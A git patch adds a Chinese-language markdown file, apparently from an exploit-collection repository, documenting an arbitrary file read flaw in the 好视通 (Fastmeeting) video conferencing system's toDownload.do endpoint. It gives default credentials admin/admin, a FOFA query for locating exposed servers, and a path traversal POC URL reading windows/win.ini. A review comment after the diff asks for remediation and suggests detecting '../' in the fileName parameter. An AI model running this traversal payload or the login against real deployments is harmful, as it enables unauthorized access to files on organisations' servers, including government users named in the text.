From aaa6091e845d2608dc171db665e6ac56141ef01f Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Fri, 24 Nov 2023 19:42:35 +0800 Subject: [PATCH] =?UTF-8?q?Create=20=E5=A5=BD=E8=A7=86=E9=80=9A=E8=A7=86?= =?UTF-8?q?=E9=A2=91=E4=BC=9A=E8=AE=AE=E7=B3=BB=E7=BB=9F=20toDownload.do?= =?UTF-8?q?=E6=8E=A5=E5=8F=A3=20=E4=BB=BB=E6=84=8F=E6=96=87=E4=BB=B6?= =?UTF-8?q?=E8=AF=BB=E5=8F=96=E6=BC=8F=E6=B4=9E.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...会议系统 toDownload.do接口 任意文件读取漏洞.md | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) create mode 100644 好视通视频会议系统 toDownload.do接口 任意文件读取漏洞.md diff --git a/好视通视频会议系统 toDownload.do接口 任意文件读取漏洞.md b/好视通视频会议系统 toDownload.do接口 任意文件读取漏洞.md new file mode 100644 index 0000000..48027c3 --- /dev/null +++ b/好视通视频会议系统 toDownload.do接口 任意文件读取漏洞.md @@ -0,0 +1,18 @@ +## 好视通视频会议系统 toDownload.do接口任意文件读取漏洞 +好视通 是国内云视频会议知名品牌,拥有多项创新核心技术优势、多方通信服务牌照及行业全面资质 ,专注为政府、公检法司、教育、集团企业等用户提供“云+端+业务全场景”解决方案。其视频会议系统的路径(fastmeeting) /register/toDownload.do?fileName= 存在任意文件遍历漏洞,可通过fileName参数读取任意文件。 + +弱口令admin/admin + +## fofa +``` +"深圳银澎云计算有限公司" +``` + +## poc +``` +/register/toDownload.do?fileName=敏感文件路径 +https://xxxxxx/register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini + +``` + +
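Review bot: the new file documents the traversal in `/register/toDownload.do?fileName=` but gives no affected version range, no vendor advisory or fix reference, and no mitigation, so a reader cannot tell whether a given deployment is patched; please add an "affected versions" line and a remediation note (server-side canonicalization of `fileName` and rejection of any resolved path outside the intended download directory). The line "弱口令admin/admin" sits between the vulnerability description and the fofa section with no statement of which login it applies to or how it relates to the file read; either tie it to a specific interface or drop it. For defenders, a short detection line would help: web-server or WAF logs showing requests to `toDownload.do` whose `fileName` value contains `../` sequences, as in the POC line, are the signal to alert on. Minor style: the poc fence keeps an empty trailing line before the closing ```.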